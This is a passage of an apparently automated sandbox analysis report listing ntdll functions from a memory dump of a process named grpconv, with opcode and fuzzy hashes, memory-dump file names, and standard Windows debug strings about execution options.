                                                                                                                                                                                    • Opcode ID: bce0b0ac9f93846d849de42e46e9be0025ce24fddcfb71af6533f2cd28d20b5d
                                                                                                                                                                                    • Instruction ID: da4b3fd44545791afe0bc115b9acd366b41a00e244d569b9a4b3b1ae4a9c5cd7
                                                                                                                                                                                    • Opcode Fuzzy Hash: bce0b0ac9f93846d849de42e46e9be0025ce24fddcfb71af6533f2cd28d20b5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1900265211000032505B5580704587004B87D5399751C425F1806554CD632DC616171
                                                                                                                                                                                    Function 04CA2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 141 4ca2a80-4ca2a8c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 6131906977082aaac076bb5b43f53ccd955920db8ef148193d8af26265ce6b9c
                                                                                                                                                                                    • Instruction ID: 24d8f4da53b5882090ea5585acf05781d512061e235e2eb3cfa36686d32c8c99
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6131906977082aaac076bb5b43f53ccd955920db8ef148193d8af26265ce6b9c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A9002A120200003650571584514696400F87E0249F51C425E1805594DC536DC917175
                                                                                                                                                                                    Function 04CA2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 146 4ca2bc0-4ca2bcc LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3faa3cb7752d39d6763a26c129917b79096d0c028f89148e1c2233dc4805dd7f
                                                                                                                                                                                    • Instruction ID: 29d5bb19095316289b9ef50c21dc42cda9f77f7597ffee0dfd5bc3c48f2f2084
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3faa3cb7752d39d6763a26c129917b79096d0c028f89148e1c2233dc4805dd7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF90027120100403F500759855086C6000A87E0349F51D415A5815559EC676DC917171
                                                                                                                                                                                    Function 04CA2B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 144 4ca2b80-4ca2b8c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: d736aa0296076460e343761e2645eb219bd98ba0f8056cb6ded8b1c181191165
                                                                                                                                                                                    • Instruction ID: 0675b2d4e46efbc676146eb1d8c2ec862c2e34e1f5abc25b411e8ea5a5330229
                                                                                                                                                                                    • Opcode Fuzzy Hash: d736aa0296076460e343761e2645eb219bd98ba0f8056cb6ded8b1c181191165
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5890027120100843F50071584504BC6000A87E0349F51C41AA0915658DC626DC517571
                                                                                                                                                                                    Function 04CA2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 145 4ca2b90-4ca2b9c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 0efa319caf59da4f1d0b017c6cd43d402d31b653031dceaf1125d71731054911
                                                                                                                                                                                    • Instruction ID: e5e8e63debc1a17c95357c08e4b03e33f6feb7c8afca829401d7c763a21f9ccc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0efa319caf59da4f1d0b017c6cd43d402d31b653031dceaf1125d71731054911
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F90027120108803F510715885047CA000A87D0349F55C815A4C1565CDC6A6DC917171
                                                                                                                                                                                    Function 04CA2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 142 4ca2b00-4ca2b0c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 1f697d893676f2bf36e0e25d880c2995962bc67139b47c27c14550f84ae9170d
                                                                                                                                                                                    • Instruction ID: 0114e6bb6d1a587b14f5e4a7a79d7b81d73583089608f6efe9ac4c389541b3e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f697d893676f2bf36e0e25d880c2995962bc67139b47c27c14550f84ae9170d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0290027120504843F54071584504AC6001A87D034DF51C415A0855698DD636DD55B6B1
                                                                                                                                                                                    Function 04CA2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 143 4ca2b10-4ca2b1c LdrInitializeThunk
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 7a041b50f1fa2cb0e21e24737290ff04d894f71360e90dd90d83b0d00e2d2fbe
                                                                                                                                                                                    • Instruction ID: 4785e8dcf0dea1448d4fa44f6e4a9e70c34c87ca2c78c54850c294967d384573
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a041b50f1fa2cb0e21e24737290ff04d894f71360e90dd90d83b0d00e2d2fbe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D90027120100803F580715845046CA000A87D1349F91C419A0816658DCA26DE5977F1
                                                                                                                                                                                    Function 04CA2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 136 4ca2b2a-4ca2b2f 137 4ca2b3f-4ca2b46 LdrInitializeThunk 136->137 138 4ca2b31-4ca2b38 136->138
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: b4bfadae67a2dbf72b3fb1fde08649c11eb0fcbc331e4100feb4a1d05cf45e80
                                                                                                                                                                                    • Instruction ID: 30e2cbfe6e48acd1bda16c9a891ffef8eb64cd00db265c6750ebb6e5fbdf6a92
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4bfadae67a2dbf72b3fb1fde08649c11eb0fcbc331e4100feb4a1d05cf45e80
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50B02B718014C1C7FB00EB200708707390167C0308F11C051D1830280E4338D090F171

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 04C97550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04CD4530
                                                                                                                                                                                    • ExecuteOptions, xrefs: 04CD44AB
                                                                                                                                                                                    • Execute=1, xrefs: 04CD451E
                                                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04CD4592
                                                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04CD4507
                                                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04CD4460
                                                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04CD454D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                    • API String ID: 0-484625025
                                                                                                                                                                                    • Opcode ID: c5fbfd05b4446957bbfca75c4afc22cea0679825885ed76eef78c1456ce6a2f7
                                                                                                                                                                                    • Instruction ID: 6670ca26f42c2fc22b646c5cc701515d82f290948dc7e11702da342ff8aa32fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: c5fbfd05b4446957bbfca75c4afc22cea0679825885ed76eef78c1456ce6a2f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61511931A02219BAEF54AE95DC9DFE973EAEF44304F0804A9E605A7180EB70BF41DF54
                                                                                                                                                                                    Function 04C69046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_4c30000_grpconv.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $$@
                                                                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                                                                    • Opcode ID: 7e505c28c6938b34a6d18962826c6142b531ba78059b884d5af8a65bc41c71db
                                                                                                                                                                                    • Instruction ID: 2803d34c04c57d4d25f9427ca3f503c32b4f786906d200bc7a957da516055038
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e505c28c6938b34a6d18962826c6142b531ba78059b884d5af8a65bc41c71db
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E812DB1D002699BDB31DF54CC44BEEB7B9AB48714F0441DAE90AB7250E770AE84DFA1